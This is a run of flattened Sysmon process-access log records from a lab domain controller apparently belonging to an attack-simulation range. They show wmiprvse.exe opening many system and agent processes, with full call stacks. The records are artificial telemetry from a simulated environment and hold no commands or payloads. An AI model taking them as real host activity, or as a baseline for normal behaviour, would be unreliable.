15:59:30.257{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025386Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.257{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025385Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025384Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025383Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025382Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025381Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025380Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025379Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025378Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025377Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025376Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025375Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025374Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025373Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025372Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025371Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025370Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025369Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025368Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025367Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 